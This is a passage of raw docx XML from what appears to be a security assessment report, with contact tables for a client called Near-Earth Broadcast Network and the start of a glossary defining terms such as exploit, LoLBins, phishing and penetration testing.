                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>lmv9443@nyu.edu</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="3BC99DA8"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37C76E0D" w14:textId="40B211F8" w:rsidR="00E34796" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00E34796">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Telephone</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6655" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78D5C3E8" w14:textId="2CC8955D" w:rsidR="00E34796" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00E34796">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>(646) 997-3600</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6E40F9C0" w14:textId="77777777" w:rsidR="00AE6477" w:rsidRPr="005264D0" w:rsidRDefault="00AE6477" w:rsidP="00C32533">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AFE9843" w14:textId="77777777" w:rsidR="00C32533" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00C32533">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc129370251"/>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Near-Earth Broadcast Network</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Style1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2695"/>
        <w:gridCol w:w="6655"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="4282314A" w14:textId="77777777" w:rsidTr="00AE6477">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226CC9B0" w14:textId="49EEDEB6" w:rsidR="00E34796" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
              <w:t>Near-Earth Broadcast Network (“NBN”)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="242088FE" w14:textId="77777777" w:rsidTr="00AE6477">
        <w:trPr>
          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2695" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17A9C13F" w14:textId="77777777" w:rsidR="00E34796" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Business Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6655" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66674DCC" w14:textId="5CA3E986" w:rsidR="00E34796" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>1800 Archer St. The Bronx, NY 10460</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="2458BDE1"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0F3431BF" w14:textId="77777777" w:rsidR="00E34796" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Website</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6655" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="60652C13" w14:textId="65CFFE81" w:rsidR="00E34796" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>https://corp.nbn</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="71C993F7" w14:textId="77777777" w:rsidTr="00B35B88">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595959" w:themeFill="text1" w:themeFillTint="A6"/>
          </w:tcPr>
          <w:p w14:paraId="7B792691" w14:textId="51B50093" w:rsidR="00E34796" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B35B88">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>Point of Contact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="35E757C4"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5D3E5E58" w14:textId="27E3E01F" w:rsidR="00E34796" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6655" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3CB63A4C" w14:textId="14E172B6" w:rsidR="00E34796" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Bill Gibson</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="67A3675A" w14:textId="77777777" w:rsidTr="00AE6477">
        <w:trPr>
          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2695" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="071ED219" w14:textId="77777777" w:rsidR="00E34796" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Title</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6655" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="446EBF08" w14:textId="18EB187D" w:rsidR="00E34796" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>CISO</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="28B58BA0"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02C0D28C" w14:textId="77777777" w:rsidR="00E34796" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Email</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6655" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A59F916" w14:textId="2C14C529" w:rsidR="00E34796" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>gibson@corp.nbn</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6510C535" w14:textId="77777777" w:rsidR="00C32533" w:rsidRPr="005264D0" w:rsidRDefault="00C32533" w:rsidP="00C32533">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1080160C" w14:textId="08CA1C06" w:rsidR="00C32533" w:rsidRPr="005264D0" w:rsidRDefault="00C32533" w:rsidP="00C32533">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CE90864" w14:textId="77777777" w:rsidR="005E496E" w:rsidRPr="005264D0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="328D9F" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="144F3873" w14:textId="2B5169E2" w:rsidR="00A34711" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="005E496E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc129370252"/>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Appendix</w:t>
      </w:r>
      <w:r w:rsidR="005E496E" w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> A: </w:t>
      </w:r>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Glossary and Definitions</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="08ABAF9A" w14:textId="77777777" w:rsidR="004F68CB" w:rsidRPr="004F68CB" w:rsidRDefault="004F68CB" w:rsidP="004F68CB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F68CB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Asset:</w:t>
      </w:r>
      <w:r w:rsidRPr="004F68CB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> Something that holds value, whether it’s a system or data, that a threat may be trying to access or compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7C6EF4" w14:textId="77777777" w:rsidR="004F68CB" w:rsidRPr="004F68CB" w:rsidRDefault="004F68CB" w:rsidP="004F68CB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F68CB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Attack Vector:</w:t>
      </w:r>
      <w:r w:rsidRPr="004F68CB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> The path or means by which an attacker can access a system or network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B94F78" w14:textId="77777777" w:rsidR="004F68CB" w:rsidRPr="004F68CB" w:rsidRDefault="004F68CB" w:rsidP="004F68CB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F68CB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Authentication:</w:t>
      </w:r>
      <w:r w:rsidRPr="004F68CB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> The process of verifying the identity of a user or device before granting access to a computer system or network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052A9DB7" w14:textId="77777777" w:rsidR="004F68CB" w:rsidRPr="004F68CB" w:rsidRDefault="004F68CB" w:rsidP="004F68CB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F68CB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Authorization:</w:t>
      </w:r>
      <w:r w:rsidRPr="004F68CB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> The process of granting or denying access to a specific resource or system based on a user's identity and permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF13744" w14:textId="77777777" w:rsidR="004F68CB" w:rsidRPr="004F68CB" w:rsidRDefault="004F68CB" w:rsidP="004F68CB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F68CB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Denial of Service (DoS):</w:t>
      </w:r>
      <w:r w:rsidRPr="004F68CB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> An attack meant to make a system unavailable to legitimate users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E217FA" w14:textId="77777777" w:rsidR="004F68CB" w:rsidRPr="004F68CB" w:rsidRDefault="004F68CB" w:rsidP="004F68CB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F68CB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Encryption</w:t>
      </w:r>
      <w:r w:rsidRPr="004F68CB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>: The process of converting sensitive data into an unreadable format to protect it from unauthorized access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABE975A" w14:textId="77777777" w:rsidR="004F68CB" w:rsidRPr="004F68CB" w:rsidRDefault="004F68CB" w:rsidP="004F68CB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F68CB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ethical Hacking:</w:t>
      </w:r>
      <w:r w:rsidRPr="004F68CB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> Authorized behavior and actions to identify vulnerabilities of a system to help improve its security posture.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC1471C" w14:textId="77777777" w:rsidR="004F68CB" w:rsidRPr="004F68CB" w:rsidRDefault="004F68CB" w:rsidP="004F68CB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F68CB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit: </w:t>
      </w:r>
      <w:r w:rsidRPr="004F68CB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>A threat event that weaponizes code or an application, to take advantage of a weakness for the purpose of having an intended effect to a target that would otherwise be impossible, unintended by the target owner, or unauthorized.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD20146" w14:textId="77777777" w:rsidR="004F68CB" w:rsidRPr="004F68CB" w:rsidRDefault="004F68CB" w:rsidP="004F68CB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F68CB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Firewall:</w:t>
      </w:r>
      <w:r w:rsidRPr="004F68CB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> A network security system that monitors and controls incoming and outgoing network traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8796E6" w14:textId="77777777" w:rsidR="004F68CB" w:rsidRPr="004F68CB" w:rsidRDefault="004F68CB" w:rsidP="004F68CB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F68CB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hacking:</w:t>
      </w:r>
      <w:r w:rsidRPr="004F68CB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> Using something in a deliberate way to create effects that </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004F68CB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004F68CB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> against the original intention or design.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B4BF70" w14:textId="77777777" w:rsidR="004F68CB" w:rsidRPr="004F68CB" w:rsidRDefault="004F68CB" w:rsidP="004F68CB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004F68CB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LoLBins</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004F68CB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (“Living off the Land Binaries”):</w:t>
      </w:r>
      <w:r w:rsidRPr="004F68CB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> Legitimate binaries or executables included with operating systems or other software that an attacker can use to perform malicious activities, often to evade detection by security software. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6920E2E8" w14:textId="77777777" w:rsidR="004F68CB" w:rsidRPr="004F68CB" w:rsidRDefault="004F68CB" w:rsidP="004F68CB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F68CB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mitigation:</w:t>
      </w:r>
      <w:r w:rsidRPr="004F68CB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> A measure taken to reduce the risk of a successful attack or to minimize the harm caused by an attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DADD977" w14:textId="77777777" w:rsidR="004F68CB" w:rsidRPr="004F68CB" w:rsidRDefault="004F68CB" w:rsidP="004F68CB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F68CB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Patch:</w:t>
      </w:r>
      <w:r w:rsidRPr="004F68CB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> A software update that fixes a computer system or network vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017C7563" w14:textId="77777777" w:rsidR="004F68CB" w:rsidRPr="004F68CB" w:rsidRDefault="004F68CB" w:rsidP="004F68CB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F68CB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Penetration testing:</w:t>
      </w:r>
      <w:r w:rsidRPr="004F68CB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> A method of testing a computer system, network, or web application to identify vulnerabilities and exploit them to gain unauthorized access to sensitive data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB01190" w14:textId="77777777" w:rsidR="004F68CB" w:rsidRPr="004F68CB" w:rsidRDefault="004F68CB" w:rsidP="004F68CB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F68CB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Phishing:</w:t>
      </w:r>
      <w:r w:rsidRPr="004F68CB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> A social engineering attack that uses email or other messaging platforms to trick users into revealing sensitive information or clicking on malicious links or attachments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639E7670" w14:textId="77777777" w:rsidR="004F68CB" w:rsidRPr="004F68CB" w:rsidRDefault="004F68CB" w:rsidP="004F68CB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F68CB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Risk:</w:t>
      </w:r>
      <w:r w:rsidRPr="004F68CB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
